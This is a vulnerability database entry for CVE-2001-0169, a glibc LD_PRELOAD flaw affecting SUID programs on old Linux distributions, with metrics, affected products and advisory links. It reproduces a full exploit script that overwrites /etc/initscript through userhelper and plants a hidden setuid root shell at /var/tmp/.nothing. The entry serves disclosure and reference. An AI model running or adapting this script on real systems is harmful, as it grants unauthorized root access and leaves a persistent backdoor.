CVE-2001-0169 : Detail

CVE-2001-0169

0.04%V3
Local
2001-05-07
02h00 +00:00
2004-09-02
07h00 +00:00

CVE Descriptions

When using the LD_PRELOAD environmental variable in SUID or SGID applications, glibc does not verify that preloaded libraries in /etc/ld.so.cache are also SUID/SGID, which could allow a local user to overwrite arbitrary files by loading a library from /lib or /usr/lib.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 2.1 | | AV:L/AC:L/Au:N/C:N/I:P/A:N | [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 290

Publication date : 2001-03-03 23h00 +00:00
Author : Shadow
EDB Verified : Yes

#!/bin/tcsh
# example of exploiting the LD_PRELOAD hole
# shadow (tested on redhat 6.0, should work on others)
if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj... to moze chwile potrwac...
while (! -e /etc/initscript )
    ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end
echo utworzylem plik initscript
cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_
echo i nawet go podmienilem
# milw0rm.com [2001-03-04]

Products Mentioned

Configuration 0

Mandrakesoft>>Mandrake_linux >> Version 6.0

Mandrakesoft>>Mandrake_linux >> Version 6.1

Mandrakesoft>>Mandrake_linux >> Version 7.0

Mandrakesoft>>Mandrake_linux >> Version 7.1

Mandrakesoft>>Mandrake_linux >> Version 7.2

Mandrakesoft>>Mandrake_linux_corporate_server >> Version 1.0.1

Redhat>>Linux >> Version 6.0

Redhat>>Linux >> Version 6.0

Redhat>>Linux >> Version 6.0

Redhat>>Linux >> Version 6.1

Redhat>>Linux >> Version 6.1

Redhat>>Linux >> Version 6.1

Redhat>>Linux >> Version 6.2

Redhat>>Linux >> Version 6.2

Redhat>>Linux >> Version 6.2

Trustix>>Secure_linux >> Version 1.1

Trustix>>Secure_linux >> Version 1.2

Turbolinux>>Turbolinux >> Version To (including) 6.0.5

Turbolinux>>Turbolinux >> Version 6.1

References

http://www.debian.org/security/2001/dsa-039
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.securityfocus.com/bid/2223
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/157650
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.redhat.com/support/errata/RHSA-2001-002.html
Tags : vendor-advisory, x_refsource_REDHAT